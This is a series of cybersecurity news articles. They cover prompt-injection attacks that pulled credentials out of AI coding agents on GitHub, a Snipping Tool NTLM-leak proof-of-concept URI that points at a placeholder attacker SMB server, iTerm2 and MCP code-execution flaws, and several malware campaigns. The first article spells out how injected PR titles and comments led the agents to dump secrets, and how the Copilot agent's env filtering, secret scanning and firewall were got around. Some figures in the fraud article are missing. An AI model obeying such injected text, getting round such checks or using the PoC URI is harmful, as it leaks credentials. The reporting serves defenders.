The attack name is a deliberate play on the classic Command and Control (C2) framework used in malware campaigns. Three widely deployed AI agents, Anthropic’s Claude Code Security Review, Google’s Gemini CLI Action, and GitHub Copilot Agent (SWE Agent), were confirmed vulnerable.

According to researcher Aonan Guan, the entire attack loop runs within GitHub itself: an attacker writes a malicious PR title or issue comment, the AI agent reads and processes it as trusted context, executes attacker-supplied instructions, and exfiltrates credentials back through a PR comment, issue comment, or git commit, no external server required.

Unlike classic indirect prompt injection, which is reactive and requires a victim to explicitly ask the AI to process a document, Comment and Control is proactive: GitHub Actions workflows auto-trigger on pull_request, issues, and issue_comment events, meaning simply opening a PR or filing an issue can activate the agent without any victim interaction.

Finding 1: Claude Code Security Review — PR Title to RCE

In Anthropic’s Claude Code Security Review action, the PR title is directly interpolated into the agent’s prompt with zero sanitization. Because the Claude CLI is invoked without --disallowed-tools or --allowed-tools restrictions, the subprocess inherits all environment variables including ANTHROPIC_API_KEY and GITHUB_TOKEN.

An attacker simply opens a PR with a malicious title that breaks out of the prompt context and instructs Claude to execute whoami, ps auxeww, or env — returning the full credential dump as a JSON “security finding” posted to the PR comment. Rated CVSS 9.4 Critical by Anthropic (upgraded from 9.3), the bug was reported via HackerOne (#3387969) and awarded a $100 bounty.

Finding 2: Gemini CLI Action — Issue Comment to API Key Leak

Google’s Gemini CLI Action includes issue titles, bodies, and comments in the agent’s prompt context under an “Additional Content” section. By injecting a fake “Trusted Content Section” immediately after it, an attacker overrides Gemini’s safety instructions, causing Gemini to post the GEMINI_API_KEY as a public issue comment, visible to anyone.

Reported to Google VRP (#1609699) by researcher Neil Fendley alongside Johns Hopkins University collaborators, the vulnerability earned a $1,337 bounty.

Finding 3: Copilot Agent — Three-Layer Defense Bypass

The GitHub Copilot Agent finding is the most technically sophisticated. GitHub had implemented three runtime-level mitigations environment variable filtering, secret scanning, and network firewall — all of which were bypassed:

• Env Filtering Bypass: The UU() function filters sensitive variables only from the child bash subprocess. Running ps auxeww from that subprocess reads /proc/[pid]/environ of the unfiltered parent Node.js process and MCP server, recovering GITHUB_TOKEN, GITHUB_COPILOT_API_TOKEN, and two additional credentials.
• Secret Scanning Bypass: GitHub’s scanner detects ghs_/ghu_ token prefixes. Base64-encoding the output before committing evades all pattern matching.
• Firewall Bypass: The encoded credential file is exfiltrated via a standard git push to a PR — a whitelisted operation — making it indistinguishable from normal Copilot workflow activity.

Adding another layer of stealth, the attack payload is hidden inside an HTML comment in the issue body, invisible in GitHub’s rendered Markdown view but fully parsed by the AI agent.

A victim sees only an innocent visible request and unknowingly assigns the issue to Copilot. The bug was reported via HackerOne (#3544297), initially dismissed as a “known issue” but reopened after the researcher submitted reverse-engineered source code proof from Copilot’s minified index.js. GitHub ultimately awarded a $500 bounty.

All three vulnerabilities share the same architectural flaw: untrusted GitHub data flows into an AI agent that holds production secrets and unrestricted tool access in the same runtime.

As researchers noted, this is the first public cross-vendor demonstration of a single prompt injection pattern defeating multiple major AI agents including one that had three dedicated runtime defenses in place.

Security experts warn the pattern extends well beyond GitHub Actions to any AI agent processing untrusted input with access to tools and secrets, including Slack bots, Jira agents, email agents, and deployment automation pipelines.

Mitigations

• Allowlist tools, never blocklist — use --allowed-tools to grant only the minimum required capabilities; blocklisting (e.g., blocking ps) is trivially bypassed with alternatives like cat /proc/*/environ.
• Least-privilege secrets — agents performing read-only tasks, like issue triage, should not hold GITHUB_TOKEN with write scope.
• Require human approval gates before agents perform outbound actions or access credentials.
• Audit all AI agent integrations in CI/CD pipelines and monitor Actions logs for anomalous credential-access patterns.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post Claude Code, Gemini CLI, and GitHub Copilot Vulnerable to Prompt Injection via GitHub Comments appeared first on Cyber Security News.

The campaign, active since at least February 2026, has been targeting sensitive institutions including Bangladesh Navy, Pakistan’s Ministry of Foreign Affairs, and several other defense and government bodies across the region.

The attack begins with a spearphishing link sent to targeted individuals. When a victim opens the link, they land on a page that looks exactly like Google Chrome’s built-in PDF viewer.

The phishing kit, internally named Z2FA_LTS, uses PDF.js version 2.16.105 to render this fake viewer, complete with toolbar controls for zoom, print, page navigation, and download.

The displayed document is a real, stolen Pakistani government diplomatic cable related to the 152nd IPU Assembly in Istanbul, but it is intentionally blurred so the victim cannot read it. After five seconds, the page automatically redirects the victim to the next stage of the attack.

Breakglass Intelligence analysts identified the phishing kit after researcher @volrant136 flagged a Cloudflare Workers URL hosting a Zimbra credential harvester pointing at Bangladesh Navy’s webmail portal, mail.navy.mil.bd.

Through URLScan analysis, researchers mapped 7 distinct phishing Workers deployed across two Cloudflare accounts over a three-month period, targeting Bangladesh Navy, Pakistan’s Ministry of Foreign Affairs, iCloud users, Nayatel, and the Bangladesh Computer Council.

Multiple independent researchers including @Huntio, @500mk500, @MichalKoczwara, and @malwrhunterteam confirmed the attribution to SideWinder.

One critical detail revealed during the investigation was a significant operational security failure by the kit developer. When analysts sent a POST request without the expected query parameter, the server returned a 500 error exposing a full Express.js stack trace.

The leaked path “/home/moincox/Z2FA_LTS/app.js” revealed the developer’s Linux username “moincox” and the internal project name Z2FA_LTS, which stands for “Zimbra 2FA Long-Term Support.”

The “LTS” label suggests that the developer maintains multiple version branches of this phishing kit. The developer handle moincox returned no results on GitHub, npm, or major code hosting platforms.

How the Infection Mechanism Works

The Z2FA_LTS phishing kit is a server-rendered Express.js application deployed on Cloudflare Workers, and its infection chain is carefully designed to look convincing at every step.

After the victim sees the blurred PDF, they are redirected to a fake Zimbra loading splash screen that pulls real CSS stylesheets directly from the legitimate Bangladesh Navy mail server, making the page visually indistinguishable from the real one.

The victim is then sent to a Zimbra Harmony skin login clone, where all static assets including favicons and stylesheets are reverse-proxied from the real server through the phishing Worker’s “/proxy/” path.

The credential harvester injects two script behaviors into the page. First, it forces an error message to stay visible that reads “Your session has expired. Please login again to continue,” which pushes the victim to log in again.

Second, after the victim submits their credentials, the server re-renders the login page with their username already filled in, making them believe the login attempt failed and prompting them to re-enter their password.

This double-submission tactic maximizes the number of credentials collected per victim. Each page load also generates a unique rotating CSRF token using express-session, confirming that the kit operates with full server-side session management.

Security teams and affected organizations should take several immediate steps. Bangladesh Navy should rotate all credentials for mail.navy.mil.bd users without delay, and BGD e-GOV CIRT should be notified at cert@cirt.gov.bd about the active credential harvesting operation.

Pakistan’s NTISB should also be alerted regarding the leaked diplomatic communications used as lures. The phishing Worker at twilight-violet-55a5.malik-jaani786.workers.dev should be reported to Cloudflare Trust and Safety.

Organizations should block all subdomains under malik-jaani786.workers.dev and monitor URLScan for new Workers subdomains from the same account.

Security teams should also watch for new Cloudflare Workers accounts that use the same Express.js plus Zimbra clone pattern, as the threat actor has already rotated accounts once from girlfriendparty42.workers.dev to malik-jaani786.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post SideWinder Uses Fake Chrome PDF Viewer and Zimbra Clone to Steal Government Webmail Credentials appeared first on Cyber Security News.

Tracked as CVE-2026-33829, the flaw resides in how Windows Snipping Tool handles deep link URI registrations using the ms-screensketch protocol schema. Affected versions of the application register this deep link, which accepts a filePath parameter.

Due to a lack of proper input validation, an attacker can supply a UNC path pointing to a remote, attacker-controlled SMB server, coercing an authenticated SMB connection and capturing the victim’s Net-NTLM hash in the process.

The vulnerability was discovered and reported by security researchers at Black Arrow, who coordinated disclosure with Microsoft prior to going public.

Windows Snipping Tool PoC

Exploitation requires minimal technical sophistication. An attacker simply needs to host a malicious URL — or an HTML page that auto-triggers the deep link and convince the target to visit it. The PoC from Black Arrow Security demonstrates the attack with a single browser-triggered URI:

textms-screensketch:edit?&filePath=\\<attacker-smb-server>\file.png&isTemporary=false&saved=true&source=Toast

When a victim opens this link, Snipping Tool launches and silently attempts to load the remote resource over SMB. During this connection attempt, Windows automatically transmits the user’s Net-NTLM authentication response to the attacker’s server, exposing credentials that can then be cracked offline or used in NTLM relay attacks against internal network resources.

What makes CVE-2026-33829 particularly dangerous is how naturally it lends itself to social engineering campaigns. Because the Snipping Tool actually opens during exploitation, the attack is visually consistent with believable pretexts such as asking an employee to crop a corporate wallpaper, edit a badge photo, or review an HR document.

An attacker could register a domain like snip.example.com and serve a convincing image URL that silently delivers the malicious deep link payload behind the scenes.

The victim sees nothing unusual; the Snipping Tool opens as expected while NTLM authentication occurs transparently in the background.

This attack vector is especially effective in corporate environments where phishing emails referencing internal HR portals, IT helpdesks, or shared document systems are common.

Patch Availability and Timeline

Microsoft addressed the vulnerability in its April 14, 2026, Patch Tuesday security update. The disclosure timeline is as follows:

• March 23, 2026 — Vulnerability reported to Microsoft.
• April 14, 2026 — Microsoft releases a security patch.
• April 14, 2026 — Coordinated public advisory and PoC release.

Organizations and individual users running affected versions of the Windows Snipping Tool should immediately apply the April 14, 2026, security update.

Security teams should also monitor internal networks for unexpected outbound SMB connections (port 445) to external or unknown hosts, which could indicate active exploitation attempts. Blocking outbound SMB traffic at the network perimeter remains a strong defensive measure regardless of patch status.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post PoC Exploit Released for Windows Snipping Tool NTLM Hash Leak Vulnerability appeared first on Cyber Security News.

According to Califio, the flaw abuses the application’s SSH integration feature, allowing attackers to turn seemingly harmless text output into local remote code execution (RCE).

Simply viewing a maliciously crafted text file can trigger the exploit. To grasp how this exploit works, it helps to understand iTerm2’s SSH integration.

Rather than unthinkingly typing commands into a remote shell, iTerm2 deploys a tiny helper script, the “conductor,” to the remote machine.

This script communicates with iTerm2 to coordinate tasks like discovering the login shell, changing directories, and uploading files. Crucially, this protocol does not use a separate network service.

The Califio research team explains that the conductor script operates inside the remote shell session, and all communication is carried over normal terminal input/output (I/O) via the pseudoterminal (PTY).

The vulnerability stems from a fundamental trust failure. iTerm2 accepts the SSH conductor protocol from any terminal output, even if it does not originate from a verified, trusted conductor session.

This means that untrusted terminal output can effectively impersonate the remote conductor by using specific terminal escape sequences:

• DCS 2000p is used to forge a hook into the SSH conductor.
  
• OSC 135 is used to send fake replies and messages back to iTerm2.

If an attacker hides these sequences in a text file, server response, or Message of the Day (MOTD), rendering that text triggers the flaw.

For example, simply running cat readme.txt on a compromised file will print the forged sequences to the screen, tricking iTerm2 into believing it has initiated a legitimate SSH integration exchange.

PTY Confusion and Exploitation

Califio highlights that iTerm2 accepts the fake conductor hook; it automatically begins its standard workflow, sending requests to verify shell environments and Python versions.

Because the malicious text file acts as a fake transcript, it feeds iTerm2 precise replies that push the terminal emulator down its fallback execution path.

Believing it’s communicating with a remote server, iTerm2 constructs a command execution request using attacker-controlled sshargs, writing the commands to the PTY as base64-encoded strings.

However, because there is no actual SSH connection routing the data to a remote machine, the local shell receives these base64 commands as plain local input.

The exploit relies on carefully formatting the sshargs payload so that the final base64-encoded chunk translates into a valid local file path, such as ace/c+aliFIo.

If the attacker places an executable payload at that specific relative path, the terminal interprets the base64 string as a local command and unknowingly executes the malware.

The Califio reported the flaw to iTerm2 on March 30, with a fix committed the next day, though it hasn’t yet reached stable releases.

Until the patched version is distributed to the public, users should exercise extreme caution when reading untrusted text files or connecting to unfamiliar SSH servers, as these may serve malicious terminal output.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post iTerm2 Flaw Abuses SSH Integration Escape Sequences to Turn Text Into Code Execution appeared first on Cyber Security News.

Tyler Robert Buchanan, of Dundee, Scotland, was admitted to conspiracy to commit wire fraud and aggravated identity theft.

U.S. prosecutors said Buchanan worked with others between September and April to target at least a dozen companies and many individual victims. He has been in federal custody since April.

Stole Millions in Virtual Currency

According to court records, the group launched large-scale SMS phishing campaigns, also known as smishing attacks.

They sent hundreds of text messages to employees at targeted companies. These messages appeared to come from the victim company or from trusted third-party IT and business process outsourcing providers.

The texts contained links to fake login pages that appeared to be real corporate websites. When employees entered their usernames, passwords, and other personal information, the data was captured by a phishing kit controlled by the attackers.

Prosecutors said the stolen credentials were then sent to a Telegram channel administered by Buchanan and another co-conspirator. Using these credentials, the attackers accessed employee accounts and company systems.

They stole sensitive information, including confidential business files, intellectual property, names, email addresses, telephone numbers, and account access data.

Buchanan later admitted that investigators found files linked to many victim companies at his residence in Scotland.

Authorities said the stolen company data helped the group identify individuals with valuable holdings of virtual currency. Buchanan and his co-conspirators then moved to compromise those personal accounts and digital wallets.

To bypass security controls, the group used SIM swapping. In these attacks, a criminal convinces or tricks a mobile carrier into porting a victim’s phone number to a SIM card under the attacker’s control.

Once the number is transferred, the attacker can intercept one-time passcodes and SMS-based two-factor authentication messages, allowing access to protected accounts.

Investigators found additional evidence on a device at Buchanan’s home, including names and addresses of victims, cryptocurrency seed phrases, and login details for at least one victim’s account.

Buchanan admitted the conspiracy stole at least a million in virtual assets from victims in the United States.

U.S. District Judge John W. Holcomb has scheduled sentencing for August. Buchanan faces a maximum sentence of years in federal prison.

One co-conspirator, Noah Michael Urban of Florida, previously received a one-year federal prison sentence and was ordered to pay million in restitution.

Three other defendants still face charges. The FBI investigated the case with help from international and domestic law enforcement partners, including Police Scotland and authorities in Spain.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post British National Admits Hacking Companies and Stealing Millions in Virtual Currency appeared first on Cyber Security News.

Carrying a maximum severity score of 9.3 out of 10, these flaws could allow unauthenticated attackers to hijack smart agricultural devices from remote locations completely.

First detailed in February 2026 and recently updated on April 2, 2026, the CISA advisory (ICSA-26-055-03) outlines a dangerous chain of security gaps.

Security researcher Michael Groberman initially discovered and reported the vulnerabilities to CISA.

If exploited, attackers could access edge devices, view sensitive cloud data without authentication, and move laterally to other devices within the same Gardyn cloud environment.

Gardyn Smart Gardens Vulnerabilities

The affected Gardyn systems suffer from a wide range of basic but critical security failures. The primary issues include the use of hard-coded and default credentials, which make it incredibly easy for threat actors to guess or extract administrative login details.

Furthermore, the system transmits sensitive information in clear text, meaning anyone intercepting network traffic can read it.

More complex flaws involve OS command injection and the lack of authentication protocols for critical functions.

This allows malicious actors to bypass standard authorization checks, manipulate user-controlled keys, and exploit active debug codes left behind in the software.

Together, these vulnerabilities spanning multiple CVEs, including CVE-2025-1242, CVE-2025-10681, and several newly added 2026 CVEs, create a direct pathway for attackers to compromise both the physical smart planters and the broader cloud infrastructure.

These vulnerabilities heavily impact devices deployed within the United States food and agriculture sectors.

The specific components and versions affected include:

• Gardyn Home Firmware and Gardyn Studio Firmware.
• Gardyn Mobile Application versions before 2.11.0.
• Gardyn Cloud API versions prior to 2.12.2026 (linked to multiple recent flaws, including CVE-2026-28766, CVE-2026-25197, CVE-2026-32646, CVE-2026-28767, and CVE-2026-32662).

While CISA notes that there is currently no evidence of these specific vulnerabilities being actively exploited in the wild, the high CVSS score makes immediate patching critical to prevent future attacks.

CISA Recommended Defensive Measures

To protect against potential remote takeovers, CISA strongly urges organizations and individual users to apply defensive strategies immediately.

Recommended mitigation actions include:

• Minimize network exposure by ensuring smart garden control devices are never directly accessible from the public internet.
• Place control system networks and remote devices securely behind firewalls, isolating them entirely from standard business or home networks.
• Use secure methods, such as updated Virtual Private Networks (VPNs), if remote access is absolutely required, keeping in mind that a VPN is only as secure as the devices it connects to.
• Perform a thorough impact analysis and risk assessment before deploying new defensive measures to avoid disrupting operations.

Users are advised to immediately update their mobile applications and cloud API integrations to the latest available versions to secure their smart gardening infrastructure against these critical remote threats.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post Critical Gardyn Smart Gardens Vulnerabilities Let Attackers Control Devices Remotely appeared first on Cyber Security News.

The OX Security Research team identified the flaw as a fundamental design decision embedded in Anthropic’s official MCP SDKs across every supported programming language, including Python, TypeScript, Java, and Rust.

Unlike a traditional coding bug, this vulnerability is architectural, meaning any developer building on Anthropic’s MCP foundation unknowingly inherits the exposure from the ground up.

The flaw enables Arbitrary Command Execution (RCE) on any system running a vulnerable MCP implementation.

Successful exploitation grants attackers direct access to sensitive user data, internal databases, API keys, and chat histories, effectively handing over complete control of the affected environment.

Researchers identified four distinct exploitation families:

• Unauthenticated UI Injection targeting popular AI frameworks.
• Hardening Bypasses in supposedly protected environments like Flowise.
• Zero-Click Prompt Injection in AI IDEs, including Windsurf and Cursor.
• Malicious Marketplace Distribution, with 9 out of 11 MCP registries successfully poisoned with a malicious test payload.

OX Security confirmed successful command execution on six live production platforms, including critical vulnerabilities in LiteLLM, LangChain, and IBM’s LangFlow.

The research produced at least 10 CVEs spanning multiple high-profile projects. Several critical flaws have been patched, including CVE-2026-30623 in LiteLLM and CVE-2026-33224 in Bisheng.

In contrast, others remain unpatched and in a “reported” state, covering tools like GPT Researcher, Agent Zero, Windsurf, and DocsGPT.

OX Security repeatedly recommended to Anthropic a protocol-level patch that would have immediately protected millions of downstream users.

Anthropic declined, describing the behavior as “expected.” The company did not object when researchers notified them of their intent to publish.

This response comes just days after Anthropic unveiled Claude Mythos, positioned as a tool to help secure the world’s software, a contrast researchers describe as a call to action for Anthropic to apply “Secure by Design” principles to its own infrastructure first.

How to Protect Your Environment

• Block public internet access to AI services connected to sensitive APIs or databases.
• Treat all external MCP configuration input as untrusted; block or restrict user-controlled inputs to STDIO parameters.
• Install MCP servers only from verified sources such as the official GitHub MCP Registry.
• Run MCP-enabled services inside sandboxes with restricted permissions.
• Monitor all tool invocations for unexpected background activity or data exfiltration attempts.
• Update all affected services to their latest patched versions immediately.

OX Security has shipped platform-level detections to identify unsafe STDIO MCP configurations in customer codebases and AI-generated code.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post Critical Anthropic’s MCP Vulnerability Enables Remote Code Execution Attacks appeared first on Cyber Security News.

Attackers are now using a single, obfuscated loader to push both Gh0st Remote Access Trojan (RAT) and CloverPlus adware onto the same victim machine, giving them both long-term system control and an immediate way to profit from the attack.

This pairing is unusual but strategic. Gh0st RAT is a well-known tool that gives attackers full control over a compromised system, while CloverPlus adware is designed to change browser behavior, install unwanted advertising components, and generate pop-up ads for financial gain.

Together, the two threats allow the attacker to maintain a backdoor for ongoing access while also monetizing the infected machine in real time.

The campaign represents a clear shift toward multi-payload delivery strategies that maximize the return from a single infection.

Researchers at the Splunk Threat Research Team (STRT) identified this specific loader after observing its behavior across compromised hosts.

The team noted that the loader uses obfuscation techniques to hide both encrypted payloads inside its resource section, making it harder for traditional security tools to detect.

The research team mapped the malware’s full behavior against the MITRE ATT&CK framework to document every tactic and technique used during execution.

The campaign’s reach and design show that threat actors are becoming more efficient in how they deploy malware. Rather than targeting victims with a single-purpose tool, this loader delivers a package that covers both data theft and ad fraud simultaneously.

Security teams around the world are being urged to review their endpoint monitoring capabilities and update detection rules to account for this kind of bundled attack.

The impact of this campaign is significant for both individuals and organizations. The adware component can disrupt browser functionality and expose users to malicious advertisements, while the RAT payload can steal sensitive data, capture keystrokes, block access to security websites, and give attackers persistent, privileged access to the infected system.

Inside the Loader: How Both Payloads Are Dropped and Executed

The loader at the center of this campaign is built to be stealthy from the very beginning. It hides two encrypted payloads inside its resource section, and the first to be released is the CloverPlus adware module, identified as AdWare.Win32.CloverPlus.

This component is tied to an executable named wiseman.exe, as shown in Figure 01: The Adware Payload, and is responsible for modifying browser startup pages and injecting pop-up advertisements.

Once the adware is handled, the loader checks whether its own file path is located inside the system’s %temp% folder.

If it is not, it drops a copy of itself there before moving to the next step: decrypting the Gh0st RAT client module, which is stored as an encrypted resource in the RSRC section of the malware binary.

After decryption, the malware generates a random file name and saves the decoded DLL to a randomly named folder at the root of the C:\ drive.

The decrypted DLL is then launched using the legitimate Windows application rundll32.exe, as shown in Figure 03: Rundll32 Execution. This technique allows the malware to execute code under a trusted system process, reducing the chance of triggering standard security alerts.

Once active, Gh0st RAT begins gathering system information, including the machine’s MAC address and hardware drive serial number, to uniquely identify the infected host within the attacker’s command-and-control (C2) infrastructure.

To stay on the system after a reboot, Gh0st RAT uses multiple persistence methods. It writes itself to the Windows Run registry key and also registers a malicious DLL as part of the Windows Remote Access service under SYSTEM\CurrentControlSet\Services\RemoteAccess\RouterManagers\Ip.

This gives it SYSTEM-level privileges every time the service starts, without requiring any action from the user.

Security teams should monitor for rundll32.exe loading non-standard file extensions from unusual directories. Endpoint tools should flag any process execution originating from the %temp% folder.

Registry modifications to Run keys and RemoteAccess service paths should trigger immediate alerts. Organizations should also watch for ping-based execution delays, which this malware uses to evade sandbox analysis.

DNS traffic anomalies and unexpected changes to the system hosts file can also indicate an active Gh0st RAT infection. Keeping endpoint detection rules updated and aligned with MITRE ATT&CK techniques T1134, T1033, T1070.004, T1547.001, T1021, T1543.003, T1056.001, and T1071.004 is strongly advised.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Gh0st RAT and CloverPlus Adware Delivered Together in New Dual-Payload Malware Campaign appeared first on Cyber Security News.

The campaign, dubbed Operation PhantomCLR, represents a serious evolution in how advanced attackers hide inside trusted systems to avoid detection.

The attack exploits a feature built into Microsoft’s .NET runtime called the AppDomainManager mechanism. When a .NET application starts up, the runtime automatically looks for a configuration file in the same folder as the executable.

Attackers have figured out how to abuse this behavior by placing a weaponized configuration file next to a legitimate Intel binary called IAStorHelp.exe, a real, signed Intel storage utility.

By doing so, the malicious code runs first, before the Intel program even begins its normal operations, making it almost invisible to traditional security tools.

Organizations in the Middle East and EMEA financial sectors are the primary targets of this operation. Attackers gain initial access through spear-phishing emails carrying a malicious ZIP archive.

Inside the archive is what appears to be a work-from-home policy PDF document from a Saudi government Ministry.

The file is actually a disguised shortcut (.pdf.lnk) that, once clicked, silently launches the Intel binary and triggers the entire attack chain in the background, while the decoy document opens on screen to avoid suspicion.

Cyfirma researchers identified and analyzed this framework following continuous monitoring of evolving threats targeting enterprise environments.

Their investigation revealed a multi-stage post-exploitation framework with capabilities comparable to mature offensive toolkits such as Cobalt Strike and Brute Ratel C4, yet without clear direct attribution to a known threat actor.

The level of design discipline, modular architecture, and anti-forensic techniques observed indicate the work of a well-resourced and operationally experienced group.

Once the attacker gains control, they have full remote access to the compromised system, including the ability to steal credentials, financial records, and intellectual property.

The broader risk to organizations is severe. Because the malware runs entirely inside a trusted, signed process, most endpoint detection and antivirus tools will not flag it.

Command-and-control communications are routed through Amazon CloudFront CDN infrastructure using a technique called domain fronting, which makes the malicious traffic look like normal cloud service activity.

Any system where this framework is active should be treated as fully compromised, with the strong likelihood that the attacker has already moved laterally through the network and may have domain-level access.

How the Infection Works

The infection follows six well-engineered stages, each designed to bypass a specific layer of enterprise security.

It starts with the spear-phishing ZIP delivery, then moves to the victim executing the disguised shortcut file.

From there, the AppDomainManager hijack takes over via the malicious configuration file, loading a rogue .NET DLL named IAStorHelpMosquitoproof.dll before legitimate program logic runs.

To avoid triggering automated sandbox environments, the malware uses a clever two-part delay strategy.

First, it runs a CPU-intensive prime number calculation that burns a full 60 seconds of processing time without making any suspicious system calls.

Second, it cycles through 892,007 iterations of a constrained AES key derivation loop, performing trial decryptions using SHA-256 hashed integer seeds until it finds the correct key at iteration 41,410.

Together, these phases exhaust most sandbox analysis windows before any malicious behavior appears.

Once the payload is decrypted and active, it uses a JIT trampoline technique to run shellcode entirely inside memory, bypassing the standard Windows memory allocation functions that most security tools monitor.

The malware also performs a “DLL injection storm,” loading 16 legitimate-looking Windows libraries in random order to flood security monitoring systems with noise and hide its real activity.

After execution completes, it cleans up all memory traces in two phases using NtProtectVirtualMemory and NtFreeVirtualMemory, making forensic recovery extremely difficult.

Security teams should take the following actions in response to this threat:-

Strategic actions:

• Deploy updated detection signatures across all endpoints immediately, as the framework bypasses conventional EDR and antivirus controls without them.
• Invest in SSL/TLS inspection for traffic bound to CDN platforms like CloudFront, since IP-based blocking alone will not stop domain fronting.
• Launch a .NET security hardening initiative focused specifically on restricting AppDomainManager usage, as this technique is being adopted by multiple threat actors.

Tactical actions:

• Block the identified C2 domains at the DNS and firewall level: dp8519iqiftub[.]cloudfront[.]net and the associated AWS ELB backend.
• Review DNS logs to identify any systems that have already resolved these malicious domains.
• Conduct endpoint sweeps to detect suspicious binaries running from non-standard paths.

Operational actions:

• Enforce AppDomainManager restrictions through application whitelisting and policy controls to prevent execution flow hijacking.
• Implement SSL/TLS inspection specifically for non-browser processes communicating with CDN endpoints.
• Enable constrained execution environments to limit abuse of .NET runtime components and scripting engines.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Hackers Use AppDomain Hijacking to Turn Trusted Intel Utility Into Malware Launcher appeared first on Cyber Security News.

The group pretends to be venture capital firms looking for investment partnerships, building trust with targets over time before delivering malicious payloads through counterfeit video conferencing platforms.

This operation is financially motivated and is believed to directly support North Korea’s missile, nuclear, and espionage programs.

The attackers make first contact through LinkedIn and Telegram, sometimes using previously compromised accounts to appear more legitimate.

They then share scheduling links via Calendly to set up meetings on fake platforms that closely copy the look and feel of Zoom, Google Meet, and Microsoft Teams.

The fake meeting environments are convincing enough to include live participation from the attackers themselves, and in some cases, deepfake video footage of real executives is used to build trust before delivering the attack.

Once a victim joins the fake meeting, they are told their microphone or camera is not working. The attacker creates a sense of urgency, pressuring the victim to fix the issue quickly.

When the victim tries to enable their audio or video, a ClickFix-style prompt appears on the screen, instructing them to copy and run a piece of code. This is the moment the malware enters the system, and from this point, the attacker has a foothold on the victim’s device.

Validin researchers identified and analyzed the full attack chain in April 2026, revealing the scale and technical complexity of the campaign’s supporting infrastructure.

They found that payloads are built specifically for the victim’s operating system, whether Windows, macOS, or Linux, and that the malware used appears to be updated variants of Cabbage RAT, also known as CageyChameleon.

In addition, the research linked UNC1069 to the recent Axios NPM package compromise and noted overlaps with the Bluenoroff threat cluster previously reported by Mandiant.

The campaign’s impact extends beyond simple system compromise. The fake meeting platforms also capture victims’ audio and video in real time through the browser’s navigator.mediaDevices.getUserMedia API, streaming the data to attacker-controlled servers via WebRTC and WebSocket channels.

This recorded footage is then reused in later social engineering campaigns to impersonate real people, making future attacks even harder to detect.

How the Infection Takes Hold on Windows Systems

On Windows machines, the ClickFix prompt instructs victims to press Win + X followed by “A” to open a terminal with administrator privileges, then paste and run a set of commands.

These commands pull down two separate PowerShell scripts from attacker-controlled servers. The first script downloads a VBScript file, writes it to the temporary directory, and executes it twice using wscript.exe, while also adding the C:\Users directory to Windows Defender’s exclusion list and restarting the WinDefend service to suppress any alerts.

The VBScript payload is an updated variant of Cabbage RAT that begins by collecting system details including the current username, hostname, operating system version, and installed browser extensions.

The addition of Google Chrome extension collection is a new capability clearly aimed at identifying installed cryptocurrency wallet extensions.

A notable change in this version is the introduction of a .lnk shortcut file placed in the Windows Startup folder, ensuring the malware runs every time the user logs in.

The RAT communicates with its command-and-control server, sending host data and awaiting coded responses: code “20” triggers a secondary encrypted payload, code “21” terminates execution, and code “22” serves as a keep-alive signal.

Security teams are advised to treat unexpected requests to run terminal commands during video calls as a serious red flag.

Organizations working in the cryptocurrency and Web3 space should verify the identity of meeting organizers through trusted, out-of-band channels before joining any session, and should monitor for unsigned scripts executing from temporary directories, unexpected Windows Defender exclusions, and outbound connections to domains mimicking Zoom or Google Meet naming patterns.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post North Korea-Linked UNC1069 Uses Fake Zoom and Teams Meetings to Hack Crypto Professionals appeared first on Cyber Security News.